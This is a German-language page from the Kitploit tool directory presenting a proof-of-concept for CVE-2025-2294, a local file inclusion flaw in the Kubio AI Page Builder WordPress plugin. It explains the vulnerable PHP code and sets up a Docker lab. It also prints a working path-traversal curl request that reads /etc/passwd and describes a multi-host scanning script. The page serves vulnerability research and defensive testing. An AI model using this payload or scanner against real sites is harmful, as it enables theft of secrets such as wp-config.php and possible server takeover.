Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2294 — Proof-of-Concept-Exploit für CVE-2025-2294, eine kritische LFI-Sicherheitslücke in Kubio AI Page Builder für WordPress. Enthält einen Python-Scanner, eine nuclei-Vorlage und ein Docker-Lab zum Testen. | Kitploit
Tools/GitHubGitHub/iteride/cve-2025-2294
Web-SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubiteride/cve-2025-2294

CVE-2025-2294

Proof-of-Concept-Exploit für CVE-2025-2294, eine kritische LFI-Sicherheitslücke in Kubio AI Page Builder für WordPress. Enthält einen Python-Scanner, eine nuclei-Vorlage und ein Docker-Lab zum Testen.

Repository anzeigen
13vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2294

Einleitung

CVE-2025-2294 ist eine kritische Sicherheitslücke vom Typ Local File Inclusion (LFI) im Plugin Kubio AI Page Builder für WordPress. Die Schwachstelle ermöglicht es einem nicht authentifizierten entfernten Angreifer, einen speziell gestalteten Parameter zu übergeben, wodurch das Plugin eine beliebige Datei auf dem Server einbinden kann; bei Vorhandensein einer einbindbaren PHP-Datei kann dies zu Remote Code Execution (RCE) führen.

  • Betroffene Versionen: Alle Plugin-Versionen ≤ 2.5.1.
  • CVSS v3.1: 9.8 (Critical).

Ziel des Berichts

  1. Systematisieren der verfügbaren Materialien und Erläuterung des Wesens der Schwachstelle.
  2. Betrachten der Bedingungen und Konfigurationen, unter denen die Schwachstelle relevant ist.
  3. Aufzeigen von Erkennungsmethoden und Schutzempfehlungen (ohne schrittweise PoCs).
  4. Geben von Empfehlungen zur Behebung und Schadensbegrenzung.

CPE / Identifikation

  • Plugin slug: kubio
  • Pfad: /wp-content/plugins/kubio/
  • Vendor: ExtendThemes / Kubio
  • CPE (Beispiel): cpe:2.3:a:extendthemes:kubio_ai_page_builder::::::wordpress::*
  • CWE: CWE-22 — Unzureichende Einschränkung eines Pfadnamens auf ein eingeschränktes Verzeichnis (Path Traversal).


    Ausnutzungsbedingungen

    • Das Plugin Kubio ist auf der Website installiert und aktiviert.
    • Version ≤ 2.5.1 (ungepatcht).
    • Ein öffentlicher HTTP(S)-Endpunkt ist verfügbar, der den Parameter __kubio-site-edit-iframe-classic-template akzeptiert.
    • (Für RCE) Auf dem System muss eine einbindbare PHP-Datei oder ein anderer Pfad zu ausführbarem Code vorhanden sein (z. B. durch Schwachstellen in anderen Komponenten oder falsche Berechtigungen).

    Auswirkungen

    • Lesen von Dateien mit Geheimnissen (z. B. wp-config.php, private Schlüssel, Logs).
    • Mögliches Hochladen/Ausführen von beliebigem Code, Ändern von Inhalten oder Einschleusen von Backdoors.
    • Serverkompromittierung, mögliche Störungen des Website-Betriebs, Löschen/Verschlüsseln von Daten.
    • Das Risiko steigt aufgrund der weiten Verbreitung des Plugins und des Auftauchens öffentlicher PoCs/Scanner.

    Technische Details

    Der anfällige Code hängt mit der Funktion kubio_hybrid_theme_load_template() zusammen, die auf das globale Array $_REQUEST zugreift:

    root@kitploit:~
    $template_id = Arr::get($_REQUEST, '__kubio-site-edit-iframe-classic-template', false);
    if ($template_id) {
        $new_template = locate_template([$template_id]);
        if ($new_template !== '') {
            return $new_template;
        }
    }
    
    • Was der Code tut:
    1. Arr::get($_REQUEST, '__kubio-site-edit-iframe-classic-template', false) — nimmt den Wert direkt aus dem globalen Satz von Eingabedaten ($_REQUEST kombiniert $_GET, $_POST, $_COOKIE). Das bedeutet, dass der Parameter remote kontrolliert wird.
    2. Wenn der Parameter vorhanden ist ($template_id wahr), ruft der Code locate_template([$template_id]) auf.
    3. locate_template() — eine WordPress-Utility (oder ein Äquivalent im Plugin) zum Auffinden von Vorlagen anhand des übergebenen relativen Pfads/Dateinamens. Im normalen Szenario wurde erwartet, dass dort Dateinamen innerhalb eines sicheren Vorlagenverzeichnisses übergeben werden, z.B. header.php oder template-parts/content.php.
    4. Der Rückgabewert ($new_template) wird dann verwendet – in der ursprünglichen Implementierung kann dies zu einem include/require des gefundenen Pfads führen, oder zur Weiterleitung dieses Pfads zur Ausgabe. Dies schafft eine LFI-Möglichkeit: Ein Angreifer kann den Pfad zu einer beliebigen Datei angeben.

    Lokaler Start

    root@kitploit:~
    git clone https://github.com/iteride/CVE-2025-2294.git && cd CVE-2025-2294/ && docker-compose up -d
    
    • In den Docker einsteigen:
    root@kitploit:~
    docker exec -it <WORDPRESS_DOCKER_ID> bash
    
    • Kubio herunterladen und starten

    Nach dem Entpacken rufen Sie http://localhost:8080/wp-admin/plugins.php auf und aktivieren Sie das Plugin

    root@kitploit:~
    cd /var/www/html/wp-content/plugins
    curl -L -o kubio-2.5.1.zip "https://downloads.wordpress.org/plugin/kubio.2.5.1.zip"
    unzip kubio-2.5.1.zip
    rm kubio-2.5.1.zip
    chown -R www-data:www-data kubio
    

    POC/Exploit

    root@kitploit:~
    curl 'http://localhost:8080/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../../etc/passwd'
    

    lfi

    __kubio-site-edit-iframe-classic-template=<path>

    Dieser Parameter übergibt einen String, den das Plugin als Vorlagenkennung/-pfad verwendet.

    Im anfälligen Codefragment wird der Wert aus $_REQUEST übernommen und ohne vorherige Normalisierung oder Einschränkung an locate_template() übergeben. Dies ermöglicht einen Path Traversal: Wenn in den Wert ../-Sequenzen eingefügt werden, kann der resultierende Pfad das erwartete Vorlagenverzeichnis verlassen und auf jede beliebige Datei im Dateisystem verweisen (einschließlich /etc/passwd).

    Genau dieser Parameter trägt die Angriffslast – mit ihm gibt der Angreifer die Zieldatei an.

    __kubio-site-edit-iframe-preview=1

    Dies ist ein Dienstflag (Vorschaumodus / iframe-Edit-Modus). Es schaltet die Anfrageverarbeitung in den Codepfad um, in dem die in __kubio-site-edit-iframe-classic-template angegebene Vorlage gelesen und verwendet wird.

    Ohne preview=1 könnte das Plugin den Parameter classic-template nicht verarbeiten oder eine andere Logik verwenden; mit preview=1 wird die Logik aktiviert, die das Lesen und Zurückgeben der Vorlage erlaubt, was die Ausnutzung ermöglicht.


    nuclei-Vorlage

    1. Passive Vorlage

    • Prüft die Plugin-Version über die Datei /wp-content/plugins/kubio/readme.txt.

    passive

    2. Aktive Vorlage

    • Prüft die Ausgabe von /etc/passwd

    active


    Skript

    Das Skript prüft die Ausgabe von /etc/passwd, ist aber dank Multithreading um ein Vielfaches schneller als nuclei und unterstützt auch das Scannen mehrerer Hosts gleichzeitig.

    root@kitploit:~
    python3 scan.py --target http://localhost:8080
    

    scan

    Tool herunterladen